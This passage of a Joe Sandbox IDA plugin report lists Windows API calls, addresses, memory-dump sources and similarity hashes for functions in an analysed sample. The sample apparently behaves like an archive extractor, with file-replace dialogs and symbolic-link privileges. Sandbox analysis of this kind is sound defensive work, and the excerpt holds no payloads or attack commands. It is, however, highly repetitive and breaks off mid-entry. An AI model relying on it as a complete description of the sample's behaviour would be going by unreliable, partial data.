                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-0
                                                                                                                        • Opcode ID: c642491f215c329a649efac70b263e986d6a6886fb6816a6077caeb2579a258e
                                                                                                                        • Instruction ID: 56aeaa6e5efcb261372ea6e64ad9f751b8e2709d6688ab39f965a21292f1e1e4
                                                                                                                        • Opcode Fuzzy Hash: c642491f215c329a649efac70b263e986d6a6886fb6816a6077caeb2579a258e
                                                                                                                        • Instruction Fuzzy Hash: 80B092A1258100BC214861141A02D760288C1CAB10330F12EF618F92809841280A0532
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE3FC
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-0
                                                                                                                        • Opcode ID: 0d8a4e86e3e5865d3356afc9cafc18c4adbc5a3e342d52e64bb7794197037056
                                                                                                                        • Instruction ID: 4a00b821fcd76de59d0e45bcbbd35eda11fcb56dc2fc865dc31d12efb10a99c9
                                                                                                                        • Opcode Fuzzy Hash: 0d8a4e86e3e5865d3356afc9cafc18c4adbc5a3e342d52e64bb7794197037056
                                                                                                                        • Instruction Fuzzy Hash: 05A011E22A8202BC300C22002E02C3B028CC0CAF28330B02EF828BC280AC80280A0832
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE3FC
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-0
                                                                                                                        • Opcode ID: ddd8d80caa78340d58e20c03747c666edc47eaf3c50ff4c92ed95d070c82f950
                                                                                                                        • Instruction ID: 4cb648500f58dc6e99fe6e523067575396d982fd9883501c8758a3735690038f
                                                                                                                        • Opcode Fuzzy Hash: ddd8d80caa78340d58e20c03747c666edc47eaf3c50ff4c92ed95d070c82f950
                                                                                                                        • Instruction Fuzzy Hash: BAA011E22A8202BC300C22002E02C3B028CC0CAF20330B82EF82ABC280A880280A0832
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE3FC
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-0
                                                                                                                        • Opcode ID: ad897729853633d140512bde49d5c52e4b0d0b2abcbd3e3ba9c65caee6c11991
                                                                                                                        • Instruction ID: 4cb648500f58dc6e99fe6e523067575396d982fd9883501c8758a3735690038f
                                                                                                                        • Opcode Fuzzy Hash: ad897729853633d140512bde49d5c52e4b0d0b2abcbd3e3ba9c65caee6c11991
                                                                                                                        • Instruction Fuzzy Hash: BAA011E22A8202BC300C22002E02C3B028CC0CAF20330B82EF82ABC280A880280A0832
                                                                                                                        APIs
                                                                                                                        • SetEndOfFile.KERNELBASE(?,00E9903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00E99F0C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 749574446-0
                                                                                                                        • Opcode ID: be7e78964a077f7ffb4762c731756b674d24f8f21ce967c6fc4c1cdfcd9c7e59
                                                                                                                        • Instruction ID: 7427609da5ea13b3caa6e38f406815bbdb8bcbfeb33409776f12e313520c1882
                                                                                                                        • Opcode Fuzzy Hash: be7e78964a077f7ffb4762c731756b674d24f8f21ce967c6fc4c1cdfcd9c7e59
                                                                                                                        • Instruction Fuzzy Hash: 1AA0113008000A8A8E002B32CA0A88C3B20EB20BC030082A8A00BCA0A2CB23880B8A00
                                                                                                                        APIs
                                                                                                                        • SetCurrentDirectoryW.KERNELBASE(?,00EAAE72,C:\Users\user\Desktop,00000000,00ED946A,00000006), ref: 00EAAC08
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectory
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1611563598-0
                                                                                                                        • Opcode ID: bd65bdaba52d66774a51dc5ddb1fe45ce2b7e5d51bb8b7d55e8ffa3b8a74d43b
                                                                                                                        • Instruction ID: 3b140748757fca23bcb99aed17ce870bb686ec257ddeff0be06209e6d6531e3d
                                                                                                                        • Opcode Fuzzy Hash: bd65bdaba52d66774a51dc5ddb1fe45ce2b7e5d51bb8b7d55e8ffa3b8a74d43b
                                                                                                                        • Instruction Fuzzy Hash: DAA011302022008F82002B328F0AA0EBAAAAFA2B00F08C038A00080230CB32C820AA00
                                                                                                                        APIs
                                                                                                                        • CloseHandle.KERNELBASE(000000FF,?,?,00E995D6,?,?,?,?,?,00EC2641,000000FF), ref: 00E9963B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2962429428-0
                                                                                                                        • Opcode ID: 95eb8d28e751b6d46afd61b58834e595b4bd9b1811aeec446eed14eb8082fcb0
                                                                                                                        • Instruction ID: 14313d93561d358ba6ac1679071913d8b4162c56c767f354b76e14c3fa32abfe
                                                                                                                        • Opcode Fuzzy Hash: 95eb8d28e751b6d46afd61b58834e595b4bd9b1811aeec446eed14eb8082fcb0
                                                                                                                        • Instruction Fuzzy Hash: 2EF08971581B159FDF308A38C459B9277E8AB12325F046B1ED0E662AE2D761658D8A40
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E91316: GetDlgItem.USER32(00000000,00003021), ref: 00E9135A
                                                                                                                          • Part of subcall function 00E91316: SetWindowTextW.USER32(00000000,00EC35F4), ref: 00E91370
                                                                                                                        • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00EAC2B1
                                                                                                                        • EndDialog.USER32(?,00000006), ref: 00EAC2C4
                                                                                                                        • GetDlgItem.USER32(?,0000006C), ref: 00EAC2E0
                                                                                                                        • SetFocus.USER32(00000000), ref: 00EAC2E7
                                                                                                                        • SetDlgItemTextW.USER32(?,00000065,?), ref: 00EAC321
                                                                                                                        • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00EAC358
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00EAC36E
                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EAC38C
                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00EAC39C
                                                                                                                        • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00EAC3B8
                                                                                                                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00EAC3D4
                                                                                                                        • _swprintf.LIBCMT ref: 00EAC404
                                                                                                                          • Part of subcall function 00E94092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E940A5
                                                                                                                        • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00EAC417
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00EAC41E
                                                                                                                        • _swprintf.LIBCMT ref: 00EAC477
                                                                                                                        • SetDlgItemTextW.USER32(?,00000068,?), ref: 00EAC48A
                                                                                                                        • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00EAC4A7
                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00EAC4C7
                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00EAC4D7
                                                                                                                        • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00EAC4F1
                                                                                                                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00EAC509
                                                                                                                        • _swprintf.LIBCMT ref: 00EAC535
                                                                                                                        • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00EAC548
                                                                                                                        • _swprintf.LIBCMT ref: 00EAC59C
                                                                                                                        • SetDlgItemTextW.USER32(?,00000069,?), ref: 00EAC5AF
                                                                                                                          • Part of subcall function 00EAAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00EAAF35
                                                                                                                          • Part of subcall function 00EAAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00ECE72C,?,?), ref: 00EAAF84
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                                        • String ID: %s %s$%s %s %s$P$REPLACEFILEDLG
                                                                                                                        • API String ID: 797121971-530609767
                                                                                                                        • Opcode ID: dd56e1d7f3d77ccb2014aff1582ee2d920c5a312eae92e39df850866ac5ed19b
                                                                                                                        • Instruction ID: b8f61896765cf6a110695c8f69cbcfa80e1dc499eb1ce0ffe82d5bc63b9be44d
                                                                                                                        • Opcode Fuzzy Hash: dd56e1d7f3d77ccb2014aff1582ee2d920c5a312eae92e39df850866ac5ed19b
                                                                                                                        • Instruction Fuzzy Hash: E5919172248348BFD621DBB1CC49FFB77ECEB8A704F045819B649E6091D771AA098772
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00E96FAA
                                                                                                                        • _wcslen.LIBCMT ref: 00E97013
                                                                                                                        • _wcslen.LIBCMT ref: 00E97084
                                                                                                                          • Part of subcall function 00E97A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00E97AAB
                                                                                                                          • Part of subcall function 00E97A9C: GetLastError.KERNEL32 ref: 00E97AF1
                                                                                                                          • Part of subcall function 00E97A9C: CloseHandle.KERNEL32(?), ref: 00E97B00
                                                                                                                          • Part of subcall function 00E9A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00E9977F,?,?,00E995CF,?,?,?,?,?,00EC2641,000000FF), ref: 00E9A1F1
                                                                                                                          • Part of subcall function 00E9A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00E9977F,?,?,00E995CF,?,?,?,?,?,00EC2641), ref: 00E9A21F
                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00E97139
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00E97155
                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00E97298
                                                                                                                          • Part of subcall function 00E99DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00E973BC,?,?,?,00000000), ref: 00E99DBC
                                                                                                                          • Part of subcall function 00E99DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00E99E70
                                                                                                                          • Part of subcall function 00E99620: CloseHandle.KERNELBASE(000000FF,?,?,00E995D6,?,?,?,?,?,00EC2641,000000FF), ref: 00E9963B
                                                                                                                          • Part of subcall function 00E9A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00E9A325,?,?,?,00E9A175,?,00000001,00000000,?,?), ref: 00E9A501
                                                                                                                          • Part of subcall function 00E9A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00E9A325,?,?,?,00E9A175,?,00000001,00000000,?,?), ref: 00E9A532
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                                                        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                        • API String ID: 3983180755-3508440684
                                                                                                                        • Opcode ID: c86c15b0eb9c0f4f0d4df9af11bd1c1ccaeb63bb3bc9f029addbd5ac3782b466
                                                                                                                        • Instruction ID: 5b794d2d12140741cda668175d70a238bf63ac7a714beadce427691bce4499fd
                                                                                                                        • Opcode Fuzzy Hash: c86c15b0eb9c0f4f0d4df9af11bd1c1ccaeb63bb3bc9f029addbd5ac3782b466
                                                                                                                        • Instruction Fuzzy Hash: AEC1C5B1914644AEDF21EB74CC42FEEB3E8AF04304F04555AF996F7282D774AA488B61
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __floor_pentium4
                                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                        • API String ID: 4168288129-2761157908
                                                                                                                        • Opcode ID: ab19212ccc3e02b87a5cf02590e1a03e706c05b3344464f2f011f547c897a815
                                                                                                                        • Instruction ID: bd57362ec4a15a9a096c98f60c0e83612de0fbcb5c826f072854d1763568e03d
                                                                                                                        • Opcode Fuzzy Hash: ab19212ccc3e02b87a5cf02590e1a03e706c05b3344464f2f011f547c897a815
                                                                                                                        • Instruction Fuzzy Hash: 3DC23A71E086288FDB25CE28DD407EAB7B5EB84305F1551EAD84EF7240E779AE858F40
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog_swprintf
                                                                                                                        • String ID: CMT$h%u$hc%u
                                                                                                                        • API String ID: 146138363-3282847064
                                                                                                                        • Opcode ID: e47e93626d59bad4385f98d9c1c9dc68a974db6c8ea45099bfea83561c8a2b7a
                                                                                                                        • Instruction ID: 48552a25212bc9c4e86a6176b1e03f835c0a37624c60c912fd9954ab60681736
                                                                                                                        • Opcode Fuzzy Hash: e47e93626d59bad4385f98d9c1c9dc68a974db6c8ea45099bfea83561c8a2b7a
                                                                                                                        • Instruction Fuzzy Hash: 3732D471514384AFDF18DF74C895AEA3BE5AF15304F04147DFD8AAB282DB70AA49CB20
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00E92874
                                                                                                                        • _strlen.LIBCMT ref: 00E92E3F
                                                                                                                          • Part of subcall function 00EA02BA: __EH_prolog.LIBCMT ref: 00EA02BF
                                                                                                                          • Part of subcall function 00EA1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00E9BAE9,00000000,?,?,?,0001043A), ref: 00EA1BA0
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E92F91
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                                                        • String ID: CMT
                                                                                                                        • API String ID: 1206968400-2756464174
                                                                                                                        • Opcode ID: 0148fedfdded0fa162c1252ee9c3fd028afe841293bc3181a5f3743c97f8a47c
                                                                                                                        • Instruction ID: d380dd11360fdc31a28bb29a6acc3e8ac3b1ae6e9442c4b39a51429b69648377
                                                                                                                        • Opcode Fuzzy Hash: 0148fedfdded0fa162c1252ee9c3fd028afe841293bc3181a5f3743c97f8a47c
                                                                                                                        • Instruction Fuzzy Hash: C16214716003449FDF19DF38C886AEA3BE1EF54304F08547EED9AAB282DB759945CB60
                                                                                                                        APIs
                                                                                                                        • VirtualQuery.KERNEL32(80000000,,0000001C,00EAE7DD,00000000,?,?,?,?,?,?,?,00EAE5E8,00000004,00EF1CEC,00EAE86D), ref: 00EAE6B4
                                                                                                                        • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00EAE5E8,00000004,00EF1CEC,00EAE86D), ref: 00EAE6CF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoQuerySystemVirtual
                                                                                                                        • String ID: D$
                                                                                                                        • API String ID: 401686933-250975860
                                                                                                                        • Opcode ID: 01b9f0e9c32cedf92d5b57a6cbfa7160d9748def70f21d38908451b84c14ff62
                                                                                                                        • Instruction ID: 7469c24ed88c2c479464312ccb72f81ad2aab7d43843f145be5301022cf3ba85
